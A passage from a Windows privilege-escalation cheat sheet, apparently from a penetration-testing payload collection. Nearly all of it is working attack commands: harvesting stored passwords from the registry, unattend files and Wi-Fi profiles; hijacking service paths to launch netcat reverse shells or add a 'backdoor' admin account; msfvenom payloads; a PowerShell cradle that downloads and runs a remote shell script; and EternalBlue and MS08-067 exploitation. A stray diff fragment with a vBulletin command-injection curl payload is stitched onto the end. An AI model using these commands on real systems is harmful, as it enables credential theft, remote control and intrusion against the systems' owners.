 reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" 
 reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
 reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
 reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
 reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
 reg query HKLM /f password /t REG_SZ /s
 reg query HKCU /f password /t REG_SZ /s
 ```
 ### Read a value of a certain sub key
 ```powershell
 REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
 ```
 ### Passwords in unattend.xml
 Location of the unattend.xml files.
 ```powershell
 C:\unattend.xml
 C:\Windows\Panther\Unattend.xml
 C:\Windows\Panther\Unattend\Unattend.xml
 C:\Windows\system32\sysprep.inf
 C:\Windows\system32\sysprep\sysprep.xml
 ```
 Display the content of these files with `dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul`.
 Example content
 ```powershell
 <component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
    <AutoLogon>
     <Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
     <Enabled>true</Enabled>
     <Username>Administrateur</Username>
    </AutoLogon>
    <UserAccounts>
     <LocalAccounts>
      <LocalAccount wcm:action="add">
       <Password>*SENSITIVE*DATA*DELETED*</Password>
       <Group>administrators;users</Group>
       <Name>Administrateur</Name>
      </LocalAccount>
     </LocalAccounts>
    </UserAccounts>
 ```
 Unattend credentials are stored in base64 and can be decoded manually with base64.
 ```powershell
 $ echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo="  | base64 -d 
 SecretSecurePassword1234*
 ```
 The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
 ### IIS Web config
 ```powershell
 Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
 ```
 ```powershell
 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
 C:\inetpub\wwwroot\web.config
 ```
 ### Other files
 ```bat
 %SYSTEMDRIVE%\pagefile.sys
 %WINDIR%\debug\NetSetup.log
 %WINDIR%\repair\sam
 %WINDIR%\repair\system
 %WINDIR%\repair\software, %WINDIR%\repair\security
 %WINDIR%\iis6.log
 %WINDIR%\system32\config\AppEvent.Evt
 %WINDIR%\system32\config\SecEvent.Evt
 %WINDIR%\system32\config\default.sav
 %WINDIR%\system32\config\security.sav
 %WINDIR%\system32\config\software.sav
 %WINDIR%\system32\config\system.sav
 %WINDIR%\system32\CCM\logs\*.log
 %USERPROFILE%\ntuser.dat
 %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat
 %WINDIR%\System32\drivers\etc\hosts
 dir c:*vnc.ini /s /b
 dir c:*ultravnc.ini /s /b
 ```
 ### Wifi passwords
 Find AP SSID
 ```bat
 netsh wlan show profile
 ```
 Get Cleartext Pass
 ```bat
 netsh wlan show profile <SSID> key=clear
 ```
 Oneliner method to extract wifi passwords from all the access point.
 ```batch
 cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on
 ```
 ### Passwords stored in services
 Saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP using [SessionGopher](https://github.com/Arvanaghi/SessionGopher)
 ```powershell
 https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1
 Import-Module path\to\SessionGopher.ps1;
 Invoke-SessionGopher -AllDomain -o
 Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
 ```
 ## EoP - Processes Enumeration and Tasks
 What processes are running?
 ```powershell
 tasklist /v
 net start
 sc query
 Get-Service
 Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
 ```
 Which processes are running as "system"
 ```powershell
 tasklist /v /fi "username eq system"
 ```
 Do you have powershell magic?
 ```powershell
 REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
 ```
 List installed programs
 ```powershell
 Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
 Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
 ```
 List services
 ```powershell
 net start
 wmic service list brief
 tasklist /SVC
 ```
 Scheduled tasks
 ```powershell
 schtasks /query /fo LIST 2>nul | findstr TaskName
 Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
 ```
 Startup tasks
 ```powershell
 wmic startup get caption,command
 reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
 reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
 reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
 dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
 dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
 ```
 ## EoP - Incorrect permissions in services
 > A service running as Administrator/SYSTEM with incorrect file permissions might allow EoP. You can replace the binary, restart the service and get system.
 Often, services are pointing to writeable locations:
 - Orphaned installs, not installed anymore but still exist in startup
 - DLL Hijacking
 - PATH directories with weak permissions
 ```powershell
 $ for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt
 $ for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"
 $ sc query state=all | findstr "SERVICE_NAME:" >> Servicenames.txt
 FOR /F %i in (Servicenames.txt) DO echo %i
 type Servicenames.txt
 FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
 FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
 ```
 Alternatively you can use the Metasploit exploit : `exploit/windows/local/service_permissions`
 Note to check file permissions you can use `cacls` and `icacls`
 > icacls (Windows Vista +)    
 > cacls (Windows XP)
 You are looking for `BUILTIN\Users:(F)`(Full access), `BUILTIN\Users:(M)`(Modify access) or  `BUILTIN\Users:(W)`(Write-only access) in the output.
 ### Example with Windows XP SP1
 ```powershell
 # NOTE: spaces are mandatory for this exploit to work !
 sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.73 4343 -e C:\WINDOWS\System32\cmd.exe"
 sc config upnphost obj= ".\LocalSystem" password= ""
 sc qc upnphost
 sc config upnphost depend= ""
 net start upnphost
 ```
 If it fails because of a missing dependency, try the following commands.
 ```powershell
 sc config SSDPSRV start=auto
 net start SSDPSRV
 net stop upnphost
 net start upnphost
 sc config upnphost depend=""
 ```
 Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals.
 ```powershell
 $ accesschk.exe -uwcqv "Authenticated Users" * /accepteula
 RW SSDPSRV
        SERVICE_ALL_ACCESS
 RW upnphost
        SERVICE_ALL_ACCESS
 $ accesschk.exe -ucqv upnphost
 upnphost
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\Authenticated Users
        SERVICE_ALL_ACCESS
  RW BUILTIN\Power Users
        SERVICE_ALL_ACCESS
 $ sc config <vuln-service> binpath="net user backdoor backdoor123 /add"
 $ sc config <vuln-service> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
 $ sc stop <vuln-service>
 $ sc start <vuln-service>
 $ sc config <vuln-service> binpath="net localgroup Administrators backdoor /add"
 $ sc stop <vuln-service>
 $ sc start <vuln-service>
 ```
 ## EoP - Windows Subsystem for Linux (WSL)
 Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032)
 > With root privileges Windows  Subsystem for Linux (WSL)  allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ <distro>.exe --default-user root. Now start your bind shell or reverse.
 ```powershell
 wsl whoami
 ./ubuntun1604.exe config --default-user root
 wsl whoami
 wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
 ```
 Binary `bash.exe` can also be found in `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe`
 Alternatively you can explore the `WSL` filesystem in the folder `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\`
 ## EoP - Unquoted Service Paths
 The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first.
 ```powershell
 wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
 gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
 ```
 Metasploit provides the exploit : `exploit/windows/local/trusted_service_path`
 ### Example
 For `C:\Program Files\something\legit.exe`, Windows will try the following paths first:
 - `C:\Program.exe`
 - `C:\Program Files.exe`
 ## EoP - Kernel Exploitation
 List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits)
 ##### #Security Bulletin&nbsp;&nbsp;&nbsp;#KB &nbsp;&nbsp;&nbsp;&nbsp;#Description&nbsp;&nbsp;&nbsp;&nbsp;#Operating System  
 - [MS17-017](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-017) 　[KB4013081]　　[GDI Palette Objects Local Privilege Escalation]　　(windows 7/8)
 - [CVE-2017-8464](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-8464) 　[LNK Remote Code Execution Vulnerability]　　(windows 10/8.1/7/2016/2010/2008)
 - [CVE-2017-0213](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2017-0213) 　[Windows COM Elevation of Privilege Vulnerability]　　(windows 10/8.1/7/2016/2010/2008)
 - [CVE-2018-0833](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-0833)   [SMBv3 Null Pointer Dereference Denial of Service]    (Windows 8.1/Server 2012 R2)
 - [CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120)   [Win32k Elevation of Privilege Vulnerability]    (Windows 7 SP1/2008 SP2,2008 R2 SP1)
 - [MS17-010](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS17-010) 　[KB4013389]　　[Windows Kernel Mode Drivers]　　(windows 7/2008/2003/XP)
 - [MS16-135](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-135) 　[KB3199135]　　[Windows Kernel Mode Drivers]　　(2016)
 - [MS16-111](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-111) 　[KB3186973]　　[kernel api]　　(Windows 10 10586 (32/64)/8.1)
 - [MS16-098](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098) 　[KB3178466]　　[Kernel Driver]　　(Win 8.1)
 - [MS16-075](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075) 　[KB3164038]　　[Hot Potato]　　(2003/2008/7/8/2012)
 - [MS16-034](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034) 　[KB3143145]　　[Kernel Driver]　　(2008/7/8/10/2012)
 - [MS16-032](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-032) 　[KB3143141]　　[Secondary Logon Handle]　　(2008/7/8/10/2012)
 - [MS16-016](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-016) 　[KB3136041]　　[WebDAV]　　(2008/Vista/7)
 - [MS16-014](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-014) 　[K3134228]　　[remote code execution]　　(2008/Vista/7)    
 ...
 - [MS03-026](./MS03-026) 　[KB823980]　　 [Buffer Overrun In RPC Interface]　　(/NT/2000/XP/2003)  
 To cross compile a program from Kali, use the following command.
 ```powershell
 Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c
 ```
 ## EoP - AlwaysInstallElevated
 Check if these registry values are set to "1".
 ```bat
 $ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
 $ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
 ```
 Then create an MSI package and install it.
 ```powershell
 $ msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
 $ msiexec /quiet /qn /i C:\evil.msi
 ```
 Technique also available in Metasploit : `exploit/windows/local/always_install_elevated`
 ## EoP - Insecure GUI apps
 Application running as SYSTEM allowing an user to spawn a CMD, or browse directories.
 Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt"
 ## EoP - Runas
 Use the `cmdkey` to list the stored credentials on the machine.
 ```powershell
 cmdkey /list
 Currently stored credentials:
 Target: Domain:interactive=WORKGROUP\Administrator
 Type: Domain Password
 User: WORKGROUP\Administrator
 ```
 Then you can use `runas` with the `/savecred` options in order to use the saved credentials. 
 The following example is calling a remote binary via an SMB share.
 ```powershell
 runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
 ```
 Using `runas` with a provided set of credential.
 ```powershell
 C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\users\Public\nc.exe -nc <attacker-ip> 4444 -e cmd.exe"
 ```
 ```powershell
 $ secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
 $ mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
 $ computer = "<hostname>"
 [System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
 ```
 ## EoP - Common Vulnerabilities and Exposure
 ### Token Impersonation (RottenPotato)
 Binary available at : https://github.com/foxglovesec/RottenPotato
 Binary available at : https://github.com/breenmachine/RottenPotatoNG
 ```c
 getuid
 getprivs
 use incognito
 list\_tokens -u
 cd c:\temp\
 execute -Hc -f ./rot.exe
 impersonate\_token "NT AUTHORITY\SYSTEM"
 ```
 ```powershell
 Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
 Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"
 Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/Invoke-PowerShellTcp.ps1');\"};"
 ```
 ### MS08-067 (NetAPI)
 Check the vulnerability with the following nmap script.
 ```c
 nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms08-067 <ip_netblock>
 ```
 Metasploit modules to exploit `MS08-067 NetAPI`.
 ```powershell
 exploit/windows/smb/ms08_067_netapi
 ```
 If you can't use Metasploit and only want a reverse shell.
 ```powershell
 https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
 Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
 Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
 Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
 Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
 Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
 Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
 Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
 python ms08-067.py 10.0.0.1 6 445
 ```
 ### MS10-015 (KiTrap0D) - Microsoft Windows NT/2000/2003/2008/XP/Vista/7 
 'KiTrap0D' User Mode to Ring Escalation (MS10-015)
 ```powershell
 https://www.exploit-db.com/exploits/11199
 Metasploit : exploit/windows/local/ms10_015_kitrap0d
 ```
 ### MS11-080 (afd.sys) - Microsoft Windows XP/2003
 ```powershell
 Python: https://www.exploit-db.com/exploits/18176
 Metasploit: exploit/windows/local/ms11_080_afdjoinleaf
 ```
 ### MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
 Check if the patch is installed : `wmic qfe list | findstr "3139914"`
 ```powershell
 Powershell:
 https://www.exploit-db.com/exploits/39719/
 https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-MS16-032.ps1
 Binary exe : https://github.com/Meatballs1/ms16-032
 Metasploit : exploit/windows/local/ms16_032_secondary_logon_handle_privesc
 ```
 ### MS17-010 (Eternal Blue)
 Check the vulnerability with the following nmap script.
 ```c
 nmap -Pn -p445 --open --max-hostgroup 3 --script smb-vuln-ms17–010 <ip_netblock>
 ```
 Metasploit modules to exploit `EternalRomance/EternalSynergy/EternalChampion`.
 ```powershell
 auxiliary/admin/smb/ms17_010_command          MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
 auxiliary/scanner/smb/smb_ms17_010            MS17-010 SMB RCE Detection
 exploit/windows/smb/ms17_010_eternalblue      MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
 exploit/windows/smb/ms17_010_eternalblue_win8 MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
 exploit/windows/smb/ms17_010_psexec           MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
 ```
 If you can't use Metasploit and only want a reverse shell.
 ```powershell
 git clone https://github.com/helviojunior/MS17-010
 # generate a simple reverse shell to use
 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe
 python2 send_and_execute.py 10.0.0.1 revshell.exe
 ```
 ## References
 * [Windows Internals Book - 02/07/2017](https://docs.microsoft.com/en-us/sysinternals/learn/windows-internals)
 * [icacls - Docs Microsoft](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/icacls)
 * [Privilege Escalation Windows - Philip Linghammar](https://xapax.gitbooks.io/security/content/privilege_escalation_windows.html)
 * [Windows elevation of privileges - Guifre Ruiz](https://guif.re/windowseop)
 * [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
 * [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
 * [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
 * [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
 * [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
 * [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
 * [Chapter 4 - Windows Post-Exploitation - 2 Nov 2017 - dostoevskylabs](https://github.com/dostoevskylabs/dostoevsky-pentest-notes/blob/master/chapter-4.md)
 * [Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/)
 * [Pentestlab.blog - WPE-01 - Stored Credentials](https://pentestlab.blog/2017/04/19/stored-credentials/)
 * [Pentestlab.blog - WPE-02 - Windows Kernel](https://pentestlab.blog/2017/04/24/windows-kernel-exploits/)
 * [Pentestlab.blog - WPE-03 - DLL Injection](https://pentestlab.blog/2017/04/04/dll-injection/)
 * [Pentestlab.blog - WPE-04 - Weak Service Permissions](https://pentestlab.blog/2017/03/30/weak-service-permissions/)
 * [Pentestlab.blog - WPE-05 - DLL Hijacking](https://pentestlab.blog/2017/03/27/dll-hijacking/)
 * [Pentestlab.blog - WPE-06 - Hot Potato](https://pentestlab.blog/2017/04/13/hot-potato/)
 * [Pentestlab.blog - WPE-07 - Group Policy Preferences](https://pentestlab.blog/2017/03/20/group-policy-preferences/)
 * [Pentestlab.blog - WPE-08 - Unquoted Service Path](https://pentestlab.blog/2017/03/09/unquoted-service-path/)
 * [Pentestlab.blog - WPE-09 - Always Install Elevated](https://pentestlab.blog/2017/02/28/always-install-elevated/) 
 * [Pentestlab.blog - WPE-10 - Token Manipulation](https://pentestlab.blog/2017/04/03/token-manipulation/)
 * [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/)
 * [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/)
 * [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/)
 * [Alternative methods of becoming SYSTEM - 20th November 2017 - Adam Chester @_xpn_](https://blog.xpnsec.com/becoming-system/)
--- a/Show More
+++ b/Show More
		`@@ -0,0 +1 @@`
							`curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;"`